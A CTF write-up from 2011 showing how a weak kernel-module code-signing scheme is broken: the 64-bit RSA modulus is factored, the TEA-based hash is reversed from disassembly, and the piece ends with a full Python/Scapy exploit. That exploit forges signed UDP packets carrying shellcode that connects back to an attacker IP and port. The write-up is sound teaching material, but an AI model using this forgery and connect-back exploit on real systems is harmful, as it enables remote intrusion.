Oct

2011

The ps3game.c program looks pretty simple to exploit: it receives code from the network, executes it, and sends back the response. So… just send your shellcode and you’re done, right?

Not quite π

In the program there is this comment:

/* GEOWITCH: this is the port protected by codeserv */ .sin_port = 0x2823,

(Note that the port number is actually 9000, since the port number is given in network byte order. 0x2328 == 9000.)

And there is a mysterious codeserv.ko file sitting in the programs directory. The file extension “.ko” indicates that this is a kernel module, and indeed “lsmod | grep codeserv” confirms that it is loaded.

No source for this kernel module, so time for some reversing. Unfortunately, the disassembler is not able to resolve the kernel symbols (or even the internal cross references), so the disassembly is a bit harder to follow than usual. There’s probably some way to get around this, but since there isn’t much time let’s try to figure it out as it is.

The function names show that RSA and TEA are probably used, with TEA (Tiny Encryption Algorithm) being somehow used to implement a hash function:

00000000000000b0 <codeserv_hash_tea>: ... 0000000000000180 <codeserv_verify_rsa>: ...

So this kernel module probably checks a signature on incoming packets and discards them if it is incorrect.

How does such a signing scheme work? Well, to start with it relies on having a public-key cryptography algorithm like RSA and a hash function. The data which should be signed is hashed, and the signer encrypts the hash with RSA using his private key. This encrypted hash is the signature. Now the receiver can verify the signature by hashing the data itself and verifying that the hash is equal to what you get when you decrypt the signature using the RSA public key.

There are a couple of things which can go wrong with such a signing scheme:

- Bad hash function: it is possible to generate collisions or preimages
- Weak RSA parameters: if the RSA key size is not large enough, the private key can be calculated from the public key
- Weak RSA paddding: RSA has the property that two encrypted values can be combined to produce a new known encrypted value

All of these problems make it possible for an attacker to potentially generate new signatures. And in fact, this implementation suffers from all of these problems! The weak RSA parameters are by far the easiest to exploit however, so we’ll continue with that one in a minute. First we’ll discuss the other problems a bit since it shows many interesting details about how this code signing works!

How would one exploit a bad hash function? If is possible to change the signed data in such a way that the hash of the changed version is equal to the hash of the original data then the original signature will also be valid for the changed version.

Now, how does the hash function in codeserv work? As mentioned before, it is a hash function constructed using TEA, which is an encryption algorithm. A standard way to construct a hash function from an encryption algorithm is to loop over the data to be hashed and use the chunks of data as encryption keys to repeatedly encrypt some fixed starting value. The final encrypted value is the hash. This is also how it is done in codeserv: it takes the first two 32-bit words of data as the plaintext and encrypts this repeatedly using successive chunks of data as the key.

A good encryption algorithm does not allow you to recover the key even when you know a plaintext and ciphertext (this is called resistence to known-plaintext attacks). When used as a hash function this means that you can’t find new data that hashes to the same value (collision resistence).

Well, the wikipedia page for TEA mentions that TEA should not be used as a hash function because each key is equivalent to three others. The linked reference has more details, and explains that flipping the most significant bit in the first and second words (or the third and fourth words) of the 4 * 32 bit key has no effect on the encryption. In our case, this means that we can flip some specific bits in the signed data without affecting the signature! The wikipedia page mentions that this was used to hack the XBOX, but it is probably not enough to hack this challenge…

To understand this, you need to know a little bit about how RSA works. RSA works using modular exponentiation. Exponentiation is something we all learn in high school, and "modular" simply means that after every mathematical operation you take the remainder after division by some number called the *modulus*. In most programming languages you can express this as:

result = pow(a,b) % m

(START SIDENOTE ON EXPONENTIATION)

The result of the exponentation gets large very quickly, so you really want to take the remainder many times during the exponentation to keep the size of the result down (taking the remainder after every multiplication gives the same result as just taking the remainder at the end). This means doing the exponentiation manually, for example using the repeated squaring algorithm (you can actually see this being used in the codeserv_verify_rsa disassembly!). We cheated by using python instead, since it has built-in modular exponentiation using the third parameter of the pow function π

result = pow(a,b,m)

(END SIDENOTE ON EXPONENTIATION)

The trick with RSA is that it uses a modulus which is the product of two large prime numbers. Without getting into the details, this means that when you raise some number *n* to a well-chosen exponent *a* modulo *m*, there is another number *b* which can be used to recover the original *n*:

n == pow(pow(n, a, m), b, m)

In RSA, *a* and *b* are the public and private exponents, m is the modulus (which is public), and n is value to be encrypted. Which one is called the "public" exponent and which one is the "private" exponent is decided based on other things.

This means RSA encryption and decryption are really just modular exponentiations. Since `pow(n1, a, m) * pow(n2, a, m) == pow(n1 * n2, a, m)`, you can actually create an encryption for `n1 * n2` without knowing the key `a` if you know the encryptions of `n1` and `n2`.

In our case this means that you can generate signatures for a lot of different hashes from a single valid signature. You can generate many such signatures and generate many different variants of some data you want to sign, and hope that one of the generated signatures corresponds to the hash of one of the generated pieces of code. This will still take a long time, but it is more efficient than just bruteforce generating useful code payloads until you find one which has a hash that you have captured a signature for. Of course, the next section describes a much more efficient exploit, so it’s not really relevant here π

As mentioned before, the public and private exponent can be calculated from each other. Usually the public exponent is 0x10001 and the private exponent is calculated from that using the Extended Euclidean Algorithm. To perform this calculation you need to know the prime factors *p* and *q* which were multiplied to form the modulus.

If you are the one who generated the keys this is easy, but if you are an attacker you need to factorize the modulus. (The modulus is public, remember.) Factorization is a problem which gets more difficult very quickly when the size of the number to factorize gets larger.

Looking in the disassembly of the codeserv_verify_rsa function there are some interesting constant values:

1ad: 48 ba 31 fb 08 cf 03 movabs rdx,0x908a8003cf08fb31 1b4: 80 8a 90 1b7: 48 89 55 e8 mov QWORD PTR [rbp-0x18],rdx 1bb: 31 f6 xor esi,esi 1bd: bf 01 00 00 00 mov edi,0x1 1c2: b9 01 00 01 00 mov ecx,0x10001 1c7: 48 89 45 e0 mov QWORD PTR [rbp-0x20],rax 1cb: eb 03 jmp 1d0

As mentioned before, 0x10001 is the number which is usually used as a public exponent. And maybe 0x908a8003cf08fb31 is the modulus? If so we are in luck, because a 64 bit value is easy to factor! Let’s try it using the GNU factor utility:

reinhart@bossbox:~$ python -c 'print 0x908a8003cf08fb31' 10415277842094422833 reinhart@bossbox:~$ factor 10415277842094422833 10415277842094422833: 3003703709 3467478437

So this number is the product of two primes of rougly equal size. Looks like an RSA modulus to me! So now we can calculate the private exponent.

# this is based on the extended euclidean algorithm, see: # http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm#Computing_a_multiplicative_inverse_in_a_finite_field def invmod(i,n): (a, aa, b, bb) = (1, i, 0, n) while bb: d = aa / bb r = aa % bb (a, aa, b, bb) = (b, bb, a - b*d, r) return a % n # a final modulo operation just to fix up negative values # prime factors of the RSA modulus p = 3003703709 q = 3467478437 # calculate private exponent from the public exponent and the prime factors # (p-1)*(q-1) is the order of the multiplicative group N/modulus print invmod(0x10001, (p-1)*(q-1))

This gives the private exponent: 5680034867677956657.

The next step is to figure out the details of the implementation, in order to produce signed packets in the format codeserv.ko expects.

To begin with, we have some guesses about the code layout:

init_module: // install hook function for intercepting udp packets cleanup_module: // remove hook function for intercepting udp packets __udp_rcv: // this is the hook function. if port == 9000 and !codeserv_verify_rsa(packet): // toss packet else: // invoke original UDP packet handler codeserv_verify_rsa: // don't know where "data" and "signature" parts of the packet are for now hash1 = codeserv_hash_tea(packet_data) hash2 = rsa_decrypt(packet_signature) return hash1 == hash2 codeserv_hash_tea: // use TEA to calculate a hash over the packet data somehow...

As mentioned before, we have some good ideas about how the hash and RSA code probably work. So it’s time to capture some packets to test these assumptions on. Capturing on the system itself did not work for us, so we sniffed a bunch of packets to port 9000 on our VPN gateway.

First thing is to read in these packets using Scapy, which is an excellent python library (and commandline app) for all kinds of network fun.

reinhart@bossbox$ python Python 2.7.1+ (r271:86832, Apr 11 2011, 18:13:53) [GCC 4.5.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> from scapy.all import rdpcap WARNING: No route found for IPv6 destination :: (no default route?) >>> pkts = rdpcap("./data.pcap") >>> pkts[0].show() ###[ IP ]### version = 4L ihl = 5L tos = 0x0 len = 524 id = 1 flags = frag = 0L ttl = 63 proto = udp chksum = 0x62c8 src = 10.11.0.1 dst = 10.11.3.2 \options \ ###[ UDP ]### sport = 56801 dport = 9000 len = 488 chksum = 0x0 ###[ Raw ]### load = "\xd9\xec\xbbj\x8e\xe1~\xb9\x8e\xbb\xe1j\x8dL\xe2\xc2\x0f\xb6\xc0\xb0g\xb9~j\xbb\x8e\xb91\x8e~\xbb\xd9t$\xb4\x8bT$\xc0ff\x81\xd9\xd1\xc31\\\x825\xff\xc8y\xf6\xe6\xde~\xcbdrR\x01\xf4\xfb\xd9\xed~\x92\x9f\xf0\x1a\xef\xbePg\xb9\xb8\xce\x8b=\x98\xcc\x04\xc7Bt\xf3\xfa\x12\xf2\xaapg\x8e,s\xd2\xf9\xee\x80\x9d\xd8\\\xfb\xec\xb1`W\xfb\xb0\xcb\xc2\xca*\x16Z\x18\x84\xcb\x13n\x9e\x15,\x89\xf3\xf3\xc4\x1bd\x96z\xb4\xf0\xbc1\x06\xa8\x88O\xfc\xa9\x7f\x8fEv\xee\xcf4\xbbb\xb3\xdc\xb0\xf2\x7f\x99l\x9a\xdcd\x1b\xe7\xc4\x84\xa1\xc3\xe6\t\x03\x86\x13\xddU\xb0Y\x8b_\x80|\xbfc:\x7f$p\x91)\xbb\xc0\x1dA\xff~v\x19`\x1bj\xa2\x96\xb5{j\x10\xa09\xd4\x1f\xfb" ###[ Padding ]### load = '\xb2x\xefG0\xdb\xa7xN\xc2qK\xc9Q\xf7}' >>> len('\xb2x\xefG0\xdb\xa7xN\xc2qK\xc9Q\xf7}') 16

Interesting! As you can see there is 16 bytes of data which is not part of the UDP payload, but comes right after it. This does not normally happen, so this is probably the signature.

However, this is a bit strange. TEA has a block size of 8 bytes, and the RSA key size is 64 bits (which is also 8 bytes), so why isn’t the signature 8 bytes as well?

Remember that RSA decryption is modular exponentiation. Since we are taking the remainder by the modulus, the result of a decryption can never be larger than the modulus. But what if the hash is larger than the modulus? It would not be decrypted correctly, and the signature check would fail! So, our first guess is that the codeserv author fixed this the easy way and encrypted the hash in two chunks.

The way this is implemented is a very bad idea from a cryptographic standpoint, but I’ve talked about crypto problems enough and want to get to some results now π

First thing is to implement the hash function. Based on the knowlege from the "Hash function problems" section this is our first guess (without even looking at the disassembly, this is based on the TEA code on wikipedia):

def tea_hash(d): words = unpack('I' * (len(d) / 4), d) v0,v1 = 0,0 for k0,k1,k2,k3 in chunks(words, 4): tmp = 0 for i in range(32): tmp = (tmp + 0x9e3779b9) & 0xffffffff v0 = (v0 + (((v1<<4) + k0) ^ (v1 + tmp) ^ ((v1>>5) + k1))) & 0xffffffff v1 = (v1 + (((v0<<4) + k2) ^ (v0 + tmp) ^ ((v0>>5) + k3))) & 0xffffffff return [v0,v1]

As described before, it justs encrypts a fixed string repeatedly with TEA, using the next block of data to be hashed as the key for each iteration. Now we check this against the disassembly (nops removed for readability):

00000000000000b0: b0: 55 push rbp b1: 48 89 e5 mov rbp,rsp b4: 41 55 push r13 b6: 49 89 f5 mov r13,rsi ; datalen b9: 41 54 push r12 bb: 53 push rbx bc: 48 83 ec 18 sub rsp,0x18 c0: 48 8b 07 mov rax,QWORD PTR [rdi] c3: 48 85 f6 test rsi,rsi c6: 48 89 45 d0 mov QWORD PTR [rbp-0x30],rax ; fetch first two words of data ca: 0f 84 a4 00 00 00 je 174 ; early exit for no data d0: 8b 55 d0 mov edx,DWORD PTR [rbp-0x30] ; use them as plaintext d3: 8b 4d d4 mov ecx,DWORD PTR [rbp-0x2c] d6: 45 31 e4 xor r12d,r12d d9: eb 05 jmp e0 .... outerloop: e0: 42 8b 1c 27 mov ebx,DWORD PTR [rdi+r12*1] ; fetch four words of data, use them as encryption key e4: 42 8b 74 27 04 mov esi,DWORD PTR [rdi+r12*1+0x4] e9: 45 31 c0 xor r8d,r8d ec: 46 8b 5c 27 08 mov r11d,DWORD PTR [rdi+r12*1+0x8] f1: 46 8b 54 27 0c mov r10d,DWORD PTR [rdi+r12*1+0xc] f6: eb 08 jmp 100 .... innerloop: ; this is the TEA encryption loop 100: 41 81 e8 47 86 c8 61 sub r8d,0x61c88647 ; tmp += 0x9e3779b9; // note 0x61c88647 == -0x9e3779b9 107: 41 89 c9 mov r9d,ecx ; v0 += (((v1<<4) + k0) ^ (v1 + tmp) ^ ((v1>>5) + k1)); 10a: 41 8d 04 08 lea eax,[r8+rcx*1] 10e: 41 c1 e1 04 shl r9d,0x4 112: 41 01 d9 add r9d,ebx 115: 44 31 c8 xor eax,r9d 118: 41 89 c9 mov r9d,ecx 11b: 41 c1 e9 05 shr r9d,0x5 11f: 41 01 f1 add r9d,esi 122: 44 31 c8 xor eax,r9d 125: 01 c2 add edx,eax 127: 89 d0 mov eax,edx ; v1 += (((v0<<4) + k2) ^ (v0 + tmp) ^ ((v0>>5) + k3)); 129: 41 89 d1 mov r9d,edx 12c: c1 e0 04 shl eax,0x4 12f: 41 c1 e9 05 shr r9d,0x5 133: 45 01 d1 add r9d,r10d 136: 44 01 d8 add eax,r11d 139: 44 31 c8 xor eax,r9d 13c: 46 8d 0c 02 lea r9d,[rdx+r8*1] 140: 44 31 c8 xor eax,r9d 143: 01 c1 add ecx,eax 145: 41 81 f8 20 37 ef c6 cmp r8d,0xc6ef3720 ; 32 iterations of TEA loop, since 0xc6ef3720 == 14c: 75 b2 jne innerloop ; (32 * 0x9e3779b9) & 0xffffffff 14e: 49 83 c4 10 add r12,0x10 ; increment data index by 16 152: 89 55 d0 mov DWORD PTR [rbp-0x30],edx 155: 89 4d d4 mov DWORD PTR [rbp-0x2c],ecx 158: 4d 39 e5 cmp r13,r12 ; loop until all data processed 15b: 75 83 jne outerloop 15d: 48 83 c4 18 add rsp,0x18 161: 48 89 c8 mov rax,rcx 164: 89 d2 mov edx,edx 166: 5b pop rbx 167: 41 5c pop r12 169: 48 c1 e0 20 shl rax,0x20 16d: 48 09 d0 or rax,rdx ; return (v0 << 32) | v1; 170: 41 5d pop r13 172: c9 leave 173: c3 ret 174: 8b 55 d0 mov edx,DWORD PTR [rbp-0x30] 177: 8b 4d d4 mov ecx,DWORD PTR [rbp-0x2c] 17a: eb e1 jmp 15d 17c: eb 02 jmp 180

So our initial idea matches the disassembly almost perfectly, except that it uses the first two words of data as the initial plaintext. So now we have the correct hash function (we still return the result as two 32-bit values for convenience):

def tea_hash(d): words = unpack('I' * (len(d) / 4), d) v0,v1 = words[:2] # fixed! for k0,k1,k2,k3 in chunks(words, 4): tmp = 0 for i in range(32): tmp = (tmp + 0x9e3779b9) & 0xffffffff v0 = (v0 + (((v1<<4) + k0) ^ (v1 + tmp) ^ ((v1>>5) + k1))) & 0xffffffff v1 = (v1 + (((v0<<4) + k2) ^ (v0 + tmp) ^ ((v0>>5) + k3))) & 0xffffffff return [v0,v1]

Now for an initial guess at the RSA code:

m = 0x908a8003cf08fb31 # RSA modulus e = 0x10001 # RSA public exponent def checksig(d,s): h1 = tea_hash(d) s1,s2 = unpack("QQ", s) h2 = [pow(s1, e, m), pow(s2, e, m)] return h1 == h2

This takes the data to be checked and the 16-byte signature as arguments. It first hashes the data, then it decrypts the two chunks of the hash from the signature, and checks that the two hashes are equal.

Now let’s try this on the captured packets:

from scapy.all import UDP, rdpcap for pkt in rdpcap("./data.pcap") udp = pkt.getlayer(UDP) if udp.dport != 9000: continue # signature is in the ip payload just after the udp packet sig = udp.getlayer(Padding).load code = udp.payload.load print checksig(code,sig)

This works! So now we know our guess for the signature format was correct. The only thing that remains is to write the entire exploit:

#!/usr/bin/env python import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from struct import unpack, pack from scapy.all import IP, UDP, Padding, rdpcap, send import socket import sys import hashlib # public rsa parameters: modulus and public exponent # these were taken from the codeserv.ko disassembly m = 10415277842094422833 e = 0x10001 # factored m using the GNU 'factor' utility p = 3003703709 q = 3467478437 assert(m == p * q) # calculates i**-1 mod n using the extended euclidean algorithm def invmod(i,n): (a, aa, b, bb) = (1, i, 0, n) while bb: d = aa / bb r = aa % bb (a, aa, b, bb) = (b, bb, a - b*d, r) return a % n # calculate private exponent priv = invmod(e, (p-1)*(q-1)) assert(pow(pow(42,e,m),priv,m) == 42) def dump_rsa(): print "RSA modulus: %d" % m print "RSA public exponent: %d" % e print "RSA prime factors: %d %d" % (p,q) print "RSA private exponent: %d" % priv # for debugging, check signatures on all packets and dump received code def dump_pcap(fn): for pkt in rdpcap(fn): udp = pkt.getlayer(UDP) if udp.dport != 9000: continue # signature is in the ip payload just after the udp packet sig = udp.getlayer(Padding).load code = udp.payload.load sigok = checksig(code,sig) sigtxt = "good" if sigok else "BAD" print "Received %d bytes of code from %s, signature %s" % (len(code), pkt.src, sigtxt) # dump code for packets with good sigs if sigok: fn = "code/%s" % (hashlib.md5(code).hexdigest()) with open(fn,"w+") as f: f.write(code) # returns list in chunks of n def chunks(data,n): return [data[i:i+n] for i in range(0, len(data), n)] # hash function based on the Tiny Encryption Algorithm. # this takes the first two words of data as plaintext and repeatedly encrypts them # using successive blocks of data as the encryption key. def tea_hash(d): words = unpack('I' * (len(d) / 4), d) v0,v1 = words[:2] for k0,k1,k2,k3 in chunks(words, 4): tmp = 0 for i in range(32): tmp = (tmp + 0x9e3779b9) & 0xffffffff v0 = (v0 + (((v1<<4) + k0) ^ (v1 + tmp) ^ ((v1>>5) + k1))) & 0xffffffff v1 = (v1 + (((v0<<4) + k2) ^ (v0 + tmp) ^ ((v0>>5) + k3))) & 0xffffffff return [v0,v1] # verifies a signature using the public key def checksig(d,s): h1 = tea_hash(d) s1,s2 = unpack("QQ", s) h2 = [pow(s1, e, m), pow(s2, e, m)] return h1 == h2 # sign the given code using the private key # returns the 16-byte signature def signature(d): h = tea_hash(d) s1 = pow(h[0], priv, m) s2 = pow(h[1], priv, m) return pack("QQ", s1, s2) # builds a correctly signed packet with the given destination and payload def build_exploit_pkt(destip, code): # code size needs to be a multiple of 16 for the hash function, pad it with zero bytes code = code.ljust((len(code) + 0xf) & ~0xf, "\0") # build packet... <3 scapy pkt = IP(dst=destip)/UDP(sport=10000, dport=9000)/code # put the signature in as padding after the udp payload pkt.getlayer(UDP).add_payload(Padding(signature(code))) return pkt def exploit(destip, command, cbip, cbport): print "%s: %s > %s:%d" % (destip, command, cbip, cbport) # read shellcode template with open('shellcode','r') as f: code = f.read() # replace ip and port for connectback assert(code.count("\x7f\x00\x00\x01") == code.count("\x23\x29") == 1) code = code.replace("\x7f\x00\x00\x01", socket.inet_aton(cbip)) code = code.replace("\x23\x29", pack("!H", cbport)) # append shell command code += command code += "\0" # build packet pkt = build_exploit_pkt(destip,code) # send packet #print "Sending packet:", repr(pkt) send(pkt, verbose=False) #dump_rsa() #dump_pcap("data.pcap") if len(sys.argv) != 5: print "\n\nUsage: ./exploit ip shellcmd connectback_ip connectback_port\n\n" sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]))

Awesome writeup, thx guys